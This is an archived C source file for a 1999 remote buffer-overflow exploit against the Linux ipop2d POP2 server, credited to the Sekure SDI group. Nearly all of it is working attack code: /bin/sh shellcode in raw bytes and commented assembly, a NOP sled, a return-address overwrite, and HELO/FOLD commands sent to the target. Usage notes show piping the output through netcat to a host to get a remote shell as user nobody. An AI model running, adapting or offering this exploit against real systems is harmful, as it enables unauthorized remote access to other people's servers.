home *** CD-ROM | disk | FTP | other *** search
- /*
- * Sekure SDI (Brazilian Information Security Team)
- * ipop2d remote exploit for linux (Jun, 02 1999)
- *
- * by c0nd0r <condor@sekure.org>
- *
- * (read the instructions below)
- *
- * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
- * falcon, vader, c_orb, marty(nordo!) and minha malinha!
- * also to #uground (irc.brasnet.org) and #SDI (efnet),
- * guys at el8.org, toxyn.org, pulhas.org
- *
- * Sincere Apologizes: duke (for the mistake we made with the wu-expl),
- * your code rocks.
- *
- * Usage:
- *
- * SDI-pop2 <imap_server> <user> <pass> [offset]
- *
- * where imap_server = IMAP server at your box (or other place as well)
- * user = any account at your box
- * pass = the account's password
- * offset = 0 is default -- increase if it's necessary.
- *
- * Example: (netcat rocks)
- *
- * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
- *
- * ----------------------------------------------------------------
- * HOWTO-exploit:
- *
- * In order to gain remote access as user nobody, you should set
- * an IMAP server at your box (just edit the inetd.conf) or at
- * any other machine which you have an account.
- *
- * During the anonymous_login() function, the ipop2d will set the
- * uid to user nobody, so you are not going to get a rootshell.
- * ----------------------------------------------------------------
- *
- * We do NOT take any responsability for the consequences of using
- * this code -- you've been warned! don't be a script k1dd13!
- *
- */
-
-
- #include <stdio.h>
-
- /*
- * (shellcode)
- *
- * jmp 0x1f
- * popl %esi
- * movl %esi,0x8(%esi)
- * xorl %eax,%eax
- * movb %eax,0x7(%esi)
- * movl %eax,0xc(%esi)
- * movb $0xb,%al
- * movl %esi,%ebx
- * leal 0x8(%esi),%ecx
- * leal 0xc(%esi),%edx
- * int $0x80
- * xorl %ebx,%ebx
- * movl %ebx,%eax
- * inc %eax
- * int $0x80
- * call -0x24
- * .string \"/bin/sh\"
- * grab your shellcode generator at www.sekure.org
- */
-
- char c0d3[] =
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
- "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
- "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
- "\xff\xff/bin/sh";
-
-
- main (int argc, char *argv[] )
- {
- char buf[2500];
- int x,y=1000, offset=0;
- long addr;
- char host[255], user[255], pass[255];
- int bsize=986;
-
- if ( argc < 4)
- {
- printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
- printf ( "usage:
- (SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
- exit (0);
- }
-
- snprintf ( host, sizeof(host), "%s", argv[1]);
- snprintf ( user, sizeof(user), "%s", argv[2]);
- snprintf ( pass, sizeof(pass), "%s", argv[3]);
-
- if ( argc > 4) offset = atoi ( argv[4]);
- /* gimme the ret + offset */
- addr = 0xbffff3c0 + offset;
- fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
-
- /* calculation of the return address position */
- bsize -= strlen ( host);
-
- for ( x = 0; x < bsize-strlen(c0d3); x++)
- buf[x] = 0x90;
-
- for ( y = 0; y < strlen(c0d3); x++, y++)
- buf[x] = c0d3[y];
-
- for ( ; x < 1012; x+=4)
- {
- buf[x ] = addr & 0x000000ff;
- buf[x+1] = (addr & 0x0000ff00) >> 8;
- buf[x+2] = (addr & 0x00ff0000) >> 16;
- buf[x+3] = (addr & 0xff000000) >> 24;
- }
-
- sleep (1);
- printf ( "HELO %s:%s %s\r\n", host, user, pass);
- sleep (1);
- printf ( "FOLD %s\r\n", buf);
-
- }
- /* www.hack.co.za [2000]*/